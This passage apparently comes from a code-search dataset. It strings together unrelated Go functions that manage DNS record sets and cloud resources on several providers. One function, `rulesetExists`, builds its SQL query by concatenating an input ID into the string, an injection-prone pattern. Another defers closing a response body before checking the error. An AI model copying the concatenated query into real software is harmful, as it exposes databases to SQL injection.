newRrset)\n\t\t}\n\t} else {\n\t\t// the rrsets already exists, so make it right.\n\t\tglog.V(4).Infof(\"Recordset %v already exists. Ensuring that it is correct.\", rrsetList)\n\t\tif len(endpoints) < 1 {\n\t\t\t// Need an appropriate CNAME record. Check that we have it.\n\t\t\tnewRrset := rrsets.New(dnsName, []string{uplevelCname}, minDNSTTL, rrstype.CNAME)\n\t\t\tglog.V(4).Infof(\"No healthy endpoints for %d. Have recordsets %v. Need recordset %v\", dnsName, rrsetList, newRrset)\n\t\t\tfound := findRrset(rrsetList, newRrset)\n\t\t\tif found != nil {\n\t\t\t\t// The existing rrset is equivalent to the required one - our work is done here\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is equivalent to needed recordset %v, our work is done here.\", rrsetList, newRrset)\n\t\t\t\treturn nil\n\t\t\t} else {\n\t\t\t\t// Need to replace the existing one with a better one (or just remove it if we have no healthy endpoints).\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v not equivalent to needed recordset %v removing existing and adding needed.\", rrsetList, newRrset)\n\t\t\t\tchangeSet := rrsets.StartChangeset()\n\t\t\t\tfor i := range rrsetList {\n\t\t\t\t\tchangeSet = changeSet.Remove(rrsetList[i])\n\t\t\t\t}\n\t\t\t\tif uplevelCname != \"\" {\n\t\t\t\t\tchangeSet = changeSet.Add(newRrset)\n\t\t\t\t\tif err := changeSet.Apply(); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tglog.V(4).Infof(\"Successfully replaced needed recordset %v -> %v\", found, newRrset)\n\t\t\t\t} else {\n\t\t\t\t\tif err := changeSet.Apply(); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tglog.V(4).Infof(\"Successfully removed existing recordset %v\", found)\n\t\t\t\t\tglog.V(4).Infof(\"Uplevel CNAME is empty string. Not adding recordset %v\", newRrset)\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\t// We have an rrset in DNS, possibly with some missing addresses and some unwanted addresses.\n\t\t\t// And we have healthy endpoints. Just replace what'd there with the healthy endpoints, if it'd not already correct.\n\t\t\tglog.V(4).Infof(\"%d: Healthy endpoints %v exist. Recordset %v exists. Reconciling.\", dnsName, endpoints, rrsetList)\n\t\t\tresolvedEndpoints, err := getResolvedEndpoints(endpoints, d.netWrapper)\n\t\t\tif err != nil { // Some invalid addresses or otherwise unresolvable DNS names.\n\t\t\t\treturn err // TODO: We could potentially add the ones we did get back, even if some of them failed to resolve.\n\t\t\t}\n\t\t\tnewRrset := rrsets.New(dnsName, resolvedEndpoints, minDNSTTL, rrstype.A)\n\t\t\tglog.V(4).Infof(\"Have recordset %v. Need recordset %v\", rrsetList, newRrset)\n\t\t\tfound := findRrset(rrsetList, newRrset)\n\t\t\tif found != nil {\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is equivalent to needed recordset %v, our work is done here.\", found, newRrset)\n\t\t\t\t// TODO: We could be more thorough about checking for equivalence to avoid unnecessary updates, but in the\n\t\t\t\t// worst case we'll just replace what'd there with an equivalent, if not exactly identical record set.\n\t\t\t\treturn nil\n\t\t\t} else {\n\t\t\t\t// Need to replace the existing one with a better one\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is not equivalent to needed recordset %v, removing existing and adding needed.\", found, newRrset)\n\t\t\t\tchangeSet := rrsets.StartChangeset()\n\t\t\t\tfor i := range rrsetList {\n\t\t\t\t\tchangeSet = changeSet.Remove(rrsetList[i])\n\t\t\t\t}\n\t\t\t\tchangeSet = changeSet.Add(newRrset)\n\t\t\t\tif err = changeSet.Apply(); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tglog.V(4).Infof(\"Successfully replaced recordset %v -> %v\", found, newRrset)\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func (s *FastDNSv2Service) GetZoneRecordSets(ctx context.Context, zone string, opt *ListZoneRecordSetOptions) (*ListZoneRecordSets, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/recordsets\", zone)\n\n\tu, err := addOptions(u, opt)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treq, err := s.client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar z *ListZoneRecordSets\n\tresp, err := s.client.Do(ctx, req, &z)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn z, resp, nil\n}", "func (client *RecordSetsClient) getCreateRequest(ctx context.Context, resourceGroupName string, privateZoneName string, recordType RecordType, relativeRecordSetName string, options *RecordSetsGetOptions) (*azcore.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/privateDnsZones/{privateZoneName}/{recordType}/{relativeRecordSetName}\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif privateZoneName == \"\" {\n\t\treturn nil, errors.New(\"parameter privateZoneName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{privateZoneName}\", url.PathEscape(privateZoneName))\n\tif recordType == \"\" {\n\t\treturn nil, errors.New(\"parameter recordType cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{recordType}\", url.PathEscape(string(recordType)))\n\tif relativeRecordSetName == \"\" {\n\t\treturn nil, errors.New(\"parameter relativeRecordSetName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{relativeRecordSetName}\", relativeRecordSetName)\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := azcore.NewRequest(ctx, http.MethodGet, azcore.JoinPaths(client.con.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Telemetry(telemetryInfo)\n\treqQP := req.URL.Query()\n\treqQP.Set(\"api-version\", \"2020-06-01\")\n\treq.URL.RawQuery = reqQP.Encode()\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (o DatasourceSetOutput) ResourceType() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v DatasourceSet) *string { return v.ResourceType }).(pulumi.StringPtrOutput)\n}", "func getHostedZoneRecords(svc *route53.Route53, zone *string) (*route53.ListResourceRecordSetsOutput, error) {\n\n\trrInput := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: zone,\n\t}\n\thostedZoneRecordSets, err := svc.ListResourceRecordSets(rrInput)\n\n\tif err != nil {\n\t\tfmt.Printf(\"error obtaining hosted zone %s by id: %s\", aws.StringValue(zone), err)\n\t\treturn nil, err\n\t}\n\n\treturn hostedZoneRecordSets, nil\n}", "func (s *FastDNSv2Service) UpdateRecordSet(ctx context.Context, rs *RecordSetCreateRequest) (*RecordSet, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/names/%v/types/%v\", rs.Zone, rs.Name, rs.Type)\n\n\treq, err := s.client.NewRequest(\"PUT\", u, rs)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar r *RecordSet\n\tresp, err := s.client.Do(ctx, req, &r)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn r, resp, nil\n}", "func (client ReferenceDataSetsClient) ListByEnvironmentPreparer(ctx context.Context, resourceGroupName string, environmentName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"environmentName\": autorest.Encode(\"path\", environmentName),\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2020-05-15\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TimeSeriesInsights/environments/{environmentName}/referenceDataSets\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func (record *PrivateDnsZonesSRVRecord) GetResourceScope() genruntime.ResourceScope {\n\treturn genruntime.ResourceScopeResourceGroup\n}", "func (o DatasourceSetOutput) ResourceID() pulumi.StringOutput {\n\treturn o.ApplyT(func(v DatasourceSet) string { return v.ResourceID }).(pulumi.StringOutput)\n}", "func (s *ResourceRecordSetServer) ApplyDnsResourceRecordSet(ctx context.Context, request *dnspb.ApplyDnsResourceRecordSetRequest) (*dnspb.DnsResourceRecordSet, error) {\n\tcl, err := createConfigResourceRecordSet(ctx, request.ServiceAccountFile)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn s.applyResourceRecordSet(ctx, cl, request)\n}", "func (ac *azureClient) DeleteRecordSet(ctx context.Context, resourceGroupName string, privateZoneName string, recordType privatedns.RecordType, name string) error {\n\tctx, _, done := tele.StartSpanWithLogger(ctx, \"privatedns.AzureClient.DeleteRecordSet\")\n\tdefer done()\n\n\t_, err := ac.recordsets.Delete(ctx, resourceGroupName, privateZoneName, recordType, name, \"\")\n\treturn err\n}", "func (p *Provider) AppendRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\tvar addedRecords []libdns.Record\n\n\tfor _, record := range records {\n\t\tbody := &LeasewebRecordSet{\n\t\t\tName: record.Name,\n\t\t\tType: record.Type,\n\t\t\tContent: []string{record.Value},\n\t\t\tTTL: int(record.TTL.Seconds()),\n\t\t}\n\n\t\tbodyBuffer := new(bytes.Buffer)\n\t\tjson.NewEncoder(bodyBuffer).Encode(body)\n\n\t\treq, err := http.NewRequest(http.MethodPost, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), bodyBuffer)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\t\tres, err := client.Do(req)\n\t\tdefer res.Body.Close()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t\t}\n\n\t\taddedRecords = append(addedRecords, record)\n\t}\n\n\treturn addedRecords, nil\n}", "func (o DatasourceSetPtrOutput) ResourceType() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *DatasourceSet) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.ResourceType\n\t}).(pulumi.StringPtrOutput)\n}", "func (p *PDNSProvider) Records(ctx context.Context) (endpoints []*endpoint.Endpoint, _ error) {\n\tzones, _, err := p.client.ListZones()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfilteredZones, _ := p.client.PartitionZones(zones)\n\n\tfor _, zone := range filteredZones {\n\t\tz, _, err := p.client.ListZone(zone.Id)\n\t\tif err != nil {\n\t\t\tlog.Warnf(\"Unable to fetch Records\")\n\t\t\treturn nil, err\n\t\t}\n\n\t\tfor _, rr := range z.Rrsets {\n\t\t\te, err := p.convertRRSetToEndpoints(rr)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tendpoints = append(endpoints, e...)\n\t\t}\n\t}\n\n\tlog.Debugf(\"Records fetched:\\n%+v\", endpoints)\n\treturn endpoints, nil\n}", "func rulesetExists(rulesetID string) (err error) {\n if ndb.Rdb == nil {\n logs.Error(\"rulesetExists -- Can't access to database\")\n return errors.New(\"rulesetExists -- Can't access to database\")\n }\n sql := \"SELECT * FROM ruleset where ruleset_uniqueid = '\" + rulesetID + \"';\"\n rows, err := ndb.Rdb.Query(sql)\n if err != nil {\n logs.Error(err.Error())\n return err\n }\n defer rows.Close()\n if rows.Next() {\n return errors.New(\"rulesetExists -- RulesetId exists\")\n } else {\n return nil\n }\n}", "func (s *FastDNSv2Service) DeleteRecordSet(ctx context.Context, opt *RecordSetOptions) (*Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/names/%v/types/%v\", opt.Zone, opt.Name, opt.Type)\n\treq, err := s.client.NewRequest(\"DELETE\", u, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn s.client.Do(ctx, req, nil)\n}", "func (r Dns_Domain_ResourceRecord) GetObject() (resp datatypes.Dns_Domain_ResourceRecord, err error) {\n\terr = r.Session.DoRequest(\"SoftLayer_Dns_Domain_ResourceRecord\", \"getObject\", nil, &r.Options, &resp)\n\treturn\n}", "func NewResourceSet(resources ...string) ResourceSet {\n\tresourceSet := make(ResourceSet)\n\tfor _, resource := range resources {\n\t\tresourceSet.Add(resource)\n\t}\n\n\treturn resourceSet\n}", "func (p *Provider) GetResources(pc *domain.ProviderConfig) ([]*domain.Resource, error) {\n\tclient, err := p.getBigQueryClient(pc.URN, Credentials(pc.Credentials.(string)))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresources := []*domain.Resource{}\n\tctx := context.Background()\n\tdatasets, err := client.GetDatasets(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, d := range datasets {\n\t\tdataset := d.toDomain()\n\t\tdataset.ProviderType = pc.Type\n\t\tdataset.ProviderURN = pc.URN\n\t\tresources = append(resources, dataset)\n\n\t\ttables, err := client.GetTables(ctx, dataset.Name)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tfor _, t := range tables {\n\t\t\ttable := t.toDomain()\n\t\t\ttable.ProviderType = pc.Type\n\t\t\ttable.ProviderURN = pc.URN\n\t\t\tresources = append(resources, table)\n\t\t}\n\t}\n\n\treturn resources, nil\n}", "func getRecords(res *RecordsResp, qntString string) {\n\t//Setting the default value of the query status to false.\n\t//If the query succeeds, at the end, we cange this status to true.\n\tres.Status = false\n\n\tqnt, err := strconv.Atoi(qntString)\n\tif err != nil {\n\t\tlog.Printf(\"Function getRecords: Something went wrong when converting the quantity of records from string to int.\\n %v\\n\", err)\n\t\treturn\n\t}\n\t\n\t// Connecting to the database\n session, err := mgo.Dial(\"localhost\");\n if err != nil {\n \tlog.Printf(\"Function getRecords: Error when opening connection to database.\\n %v\\n\", err)\n \treturn\n }\n defer session.Close()\n \n // Querying the database\n conn := session.DB(DATABASE_NAME).C(RECORDS_COLLECTION)\n if err := conn.Find(nil).Limit(qnt).All(&res.Records); err != nil {\n \tlog.Printf(\"Function getRecords: Error when querying database.\\n %v\\n\", err)\n \treturn\n }\n \n // Getting the User Data\n conn = session.DB(DATABASE_NAME).C(USERS_COLLECTION)\n for i, _ := range res.Records {\n \tif err := conn.FindId(res.Records[i].UserId).One(&res.Records[i].UserData); err != nil {\n \t\tlog.Printf(\"Function getRecords: Error when getting user data\\n %v\\n\", err)\n \t\treturn\n \t}\n }\n \n //Query succeeded\n res.Status = true\n}", "func (client DnsClient) patchRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPatch, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response PatchRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (m *MockClient) ListResourceRecordSets(arg0 *route53.ListResourceRecordSetsInput) (*route53.ListResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListResourceRecordSets\", arg0)\n\tret0, _ := ret[0].(*route53.ListResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (client *AuroraDNSClient) GetRecords(zoneID string) ([]records.GetRecordsResponse, error) {\n\tlogrus.Debugf(\"GetRecords(%s)\", zoneID)\n\trelativeURL := fmt.Sprintf(\"zones/%s/records\", zoneID)\n\n\tresponse, err := client.requestor.Request(relativeURL, \"GET\", []byte(\"\"))\n\tif err != nil {\n\t\tlogrus.Errorf(\"Failed to receive records: %s\", err)\n\t\treturn nil, err\n\t}\n\n\tvar respData []records.GetRecordsResponse\n\terr = json.Unmarshal(response, &respData)\n\tif err != nil {\n\t\tlogrus.Errorf(\"Failed to unmarshall response: %s\", err)\n\t\treturn nil, err\n\t}\n\n\treturn respData, nil\n}", "func RS(namespace, name string, containerImages ...string) kapisext.ReplicaSet {\n\treturn kapisext.ReplicaSet{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tNamespace: namespace,\n\t\t\tName: name,\n\t\t\tSelfLink: \"/rs/\" + name,\n\t\t},\n\t\tSpec: kapisext.ReplicaSetSpec{\n\t\t\tTemplate: kapi.PodTemplateSpec{\n\t\t\t\tSpec: PodSpec(containerImages...),\n\t\t\t},\n\t\t},\n\t}\n}", "func (m *MockClient) ListResourceRecordSets(input *route53.ListResourceRecordSetsInput) (*route53.ListResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListResourceRecordSets\", input)\n\tret0, _ := ret[0].(*route53.ListResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func ResourceRecordSetToProto(resource *dns.ResourceRecordSet) *dnspb.DnsResourceRecordSet {\n\tp := &dnspb.DnsResourceRecordSet{\n\t\tDnsName: dcl.ValueOrEmptyString(resource.DnsName),\n\t\tDnsType: dcl.ValueOrEmptyString(resource.DnsType),\n\t\tTtl: dcl.ValueOrEmptyInt64(resource.Ttl),\n\t\tManagedZone: dcl.ValueOrEmptyString(resource.ManagedZone),\n\t\tProject: dcl.ValueOrEmptyString(resource.Project),\n\t}\n\tfor _, r := range resource.Target {\n\t\tp.Target = append(p.Target, r)\n\t}\n\n\treturn p\n}", "func (mr *MockClientMockRecorder) ListResourceRecordSets(input interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ListResourceRecordSets), input)\n}", "func (c Client) GetRecords(ctx context.Context, hostname, recordType string) ([]DNSRecord, error) {\n\tendpoint := c.baseURL.JoinPath(\"dns\", \"record\", hostname)\n\n\tquery := endpoint.Query()\n\tquery.Set(\"recordType\", recordType)\n\tendpoint.RawQuery = query.Encode()\n\n\tapiResp := RecordsResponse{}\n\terr := c.doRetry(ctx, http.MethodGet, endpoint.String(), nil, &apiResp)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif apiResp.StatusCode/100 != 2 {\n\t\treturn nil, fmt.Errorf(\"API error: %w\", apiResp.APIException)\n\t}\n\n\treturn apiResp.DNSRecords, nil\n}", "func (rs *Resources) GetByName(name string) (*ResourceConfig, bool) {\n\tresource, ok := rs.rsMap[name]\n\treturn resource, ok\n}", "func (d *DNS) DeleteResourceRecordSets(projectID string, managedZone string) error {\n\tvar deletions []*v1.ResourceRecordSet\n\tresourceRecordSets, err := d.GetResourceRecordSets(projectID, managedZone)\n\tif err != nil {\n\t\treturn err\n\t}\n\td.log.Info(\"Deleting all records from DNS zone %s:\", managedZone)\n\tfor _, resourceRecordSet := range resourceRecordSets {\n\t\tif resourceRecordSet.Type == \"SOA\" || resourceRecordSet.Type == \"NS\" {\n\t\t\tcontinue\n\t\t}\n\t\tdeletions = append(deletions, resourceRecordSet)\n\t\td.log.ListItem(\"%s %s\", resourceRecordSet.Type, resourceRecordSet.Name)\n\t}\n\tchange := &v1.Change{\n\t\tDeletions: deletions,\n\t}\n\tif err := d.executeChange(projectID, managedZone, change); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (c serverResources) findResourceFromResourceName(gvr schema.GroupVersionResource) (schema.GroupVersionKind, error) {\n\t_, serverGroupsAndResources, err := c.cachedClient.ServerGroupsAndResources()\n\tif err != nil && !strings.Contains(err.Error(), \"Got empty response for\") {\n\t\tif discovery.IsGroupDiscoveryFailedError(err) {\n\t\t\tlogDiscoveryErrors(err)\n\t\t} else if isServerCurrentlyUnableToHandleRequest(err) {\n\t\t\tlogger.V(3).Info(\"failed to find preferred resource version\", \"error\", err.Error())\n\t\t} else {\n\t\t\tlogger.Error(err, \"failed to find preferred resource version\")\n\t\t\treturn schema.GroupVersionKind{}, err\n\t\t}\n\t}\n\tapiResource, err := findResourceFromResourceName(gvr, serverGroupsAndResources)\n\tif err != nil {\n\t\treturn schema.GroupVersionKind{}, err\n\t}\n\treturn schema.GroupVersionKind{Group: apiResource.Group, Version: apiResource.Version, Kind: apiResource.Kind}, err\n}", "func (o DatasourceSetPtrOutput) ResourceID() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *DatasourceSet) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn &v.ResourceID\n\t}).(pulumi.StringPtrOutput)\n}", "func (client DnsClient) getZoneRecords(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/zones/{zoneNameOrId}/records\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response GetZoneRecordsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (rs *ResourceCollection) Resources() []Resource {\n\trs.checkMap()\n\tres := []Resource{}\n\n\tfor _, r := range rs.resources {\n\t\tres = append(res, r)\n\t}\n\treturn res\n}", "func GetRecord(client *record.Record, zoneID interface{}, zoneVersion interface{}, recordID interface{}) (*record.RecordInfo, error) {\n\tvar zid, zv, rid int64\n\tzid, _ = strconv.ParseInt(zoneID.(string), 10, 64)\n\tzv, _ = strconv.ParseInt(zoneVersion.(string), 10, 64)\n\trid, _ = strconv.ParseInt(recordID.(string), 10, 64)\n\n\trecords, err := client.List(zid, zv)\n\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"Cannot read record: %v\", rid)\n\t}\n\n\t// TODO: need to implement this to be sorted to improve speed\n\tfor _, r := range records {\n\t\tif r.Id == rid {\n\t\t\tlog.Printf(\"[DEBUG] Record found: %v\", rid)\n\t\t\treturn r, nil\n\t\t}\n\t}\n\n\t// not found\n\treturn nil, fmt.Errorf(\"Record not found\")\n}", "func (mr *MockClientMockRecorder) ListResourceRecordSets(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ListResourceRecordSets), arg0)\n}", "func (client ReferenceDataSetsClient) GetResponder(resp *http.Response) (result ReferenceDataSetResource, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (msg *RegisterRMRequest) ToResourceSet(proxySID, rmSID string) ResourceManagerSet {\n\trms := ResourceManagerSet{}\n\tfor _, resource := range strings.Split(msg.ResourceIDs, \",\") {\n\t\trms.ResourceManagers = append(rms.ResourceManagers, ResourceManager{\n\t\t\tResource: resource,\n\t\t\tProxySID: proxySID,\n\t\t\tRMSID: rmSID,\n\t\t})\n\t}\n\n\treturn rms\n}", "func NewPrivateRecordSet(ctx *pulumi.Context,\n\tname string, args *PrivateRecordSetArgs, opts ...pulumi.ResourceOption) (*PrivateRecordSet, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.PrivateZoneName == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'PrivateZoneName'\")\n\t}\n\tif args.RecordType == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'RecordType'\")\n\t}\n\tif args.ResourceGroupName == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ResourceGroupName'\")\n\t}\n\taliases := pulumi.Aliases([]pulumi.Alias{\n\t\t{\n\t\t\tType: pulumi.String(\"azure-nextgen:network/v20200101:PrivateRecordSet\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-native:network:PrivateRecordSet\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-nextgen:network:PrivateRecordSet\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-native:network/v20180901:PrivateRecordSet\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-nextgen:network/v20180901:PrivateRecordSet\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-native:network/v20200601:PrivateRecordSet\"),\n\t\t},\n\t\t{\n\t\t\tType: pulumi.String(\"azure-nextgen:network/v20200601:PrivateRecordSet\"),\n\t\t},\n\t})\n\topts = append(opts, aliases)\n\tvar resource PrivateRecordSet\n\terr := ctx.RegisterResource(\"azure-native:network/v20200101:PrivateRecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (s dnsRecordSetNamespaceLister) List(selector labels.Selector) (ret []*v1alpha1.DnsRecordSet, err error) {\n\terr = cache.ListAllByNamespace(s.indexer, s.namespace, selector, func(m interface{}) {\n\t\tret = append(ret, m.(*v1alpha1.DnsRecordSet))\n\t})\n\treturn ret, err\n}", "func (client *RecordSetsClient) listCreateRequest(ctx context.Context, resourceGroupName string, privateZoneName string, options *RecordSetsListOptions) (*azcore.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/privateDnsZones/{privateZoneName}/ALL\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif privateZoneName == \"\" {\n\t\treturn nil, errors.New(\"parameter privateZoneName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{privateZoneName}\", url.PathEscape(privateZoneName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := azcore.NewRequest(ctx, http.MethodGet, azcore.JoinPaths(client.con.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Telemetry(telemetryInfo)\n\treqQP := req.URL.Query()\n\tif options != nil && options.Top != nil {\n\t\treqQP.Set(\"$top\", strconv.FormatInt(int64(*options.Top), 10))\n\t}\n\tif options != nil && options.Recordsetnamesuffix != nil {\n\t\treqQP.Set(\"$recordsetnamesuffix\", *options.Recordsetnamesuffix)\n\t}\n\treqQP.Set(\"api-version\", \"2020-06-01\")\n\treq.URL.RawQuery = reqQP.Encode()\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func TestGetSets(t *testing.T) {\n\ttests.ResetLog()\n\tdefer tests.DisplayLog()\n\n\tconst fixture = \"basic.json\"\n\tset1, err := qfix.Get(fixture)\n\tif err != nil {\n\t\tt.Fatalf(\"\\t%s\\tShould load query record from file : %v\", tests.Failed, err)\n\t}\n\tt.Logf(\"\\t%s\\tShould load query record from file.\", tests.Success)\n\n\tdb, err := db.NewMGO(tests.Context, tests.TestSession)\n\tif err != nil {\n\t\tt.Fatalf(\"\\t%s\\tShould be able to get a Mongo session : %v\", tests.Failed, err)\n\t}\n\tdefer db.CloseMGO(tests.Context)\n\n\tdefer func() {\n\t\tif err := qfix.Remove(db, prefix); err != nil {\n\t\t\tt.Fatalf(\"\\t%s\\tShould be able to remove the query set : %v\", tests.Failed, err)\n\t\t}\n\t\tt.Logf(\"\\t%s\\tShould be able to remove the query set.\", tests.Success)\n\t}()\n\n\tt.Log(\"Given the need to retrieve a list of query sets.\")\n\t{\n\t\tt.Log(\"\\tWhen using fixture\", fixture)\n\t\t{\n\t\t\tif err := query.Upsert(tests.Context, db, set1); err != nil {\n\t\t\t\tt.Fatalf(\"\\t%s\\tShould be able to create a query set : %s\", tests.Failed, err)\n\t\t\t}\n\t\t\tt.Logf(\"\\t%s\\tShould be able to create a query set.\", tests.Success)\n\n\t\t\tset1.Name += \"2\"\n\t\t\tif err := query.Upsert(tests.Context, db, set1); err != nil {\n\t\t\t\tt.Fatalf(\"\\t%s\\tShould be able to create a second query set : %s\", tests.Failed, err)\n\t\t\t}\n\t\t\tt.Logf(\"\\t%s\\tShould be able to create a second query set.\", tests.Success)\n\n\t\t\tsets, err := query.GetAll(tests.Context, db, nil)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"\\t%s\\tShould be able to retrieve the query sets : 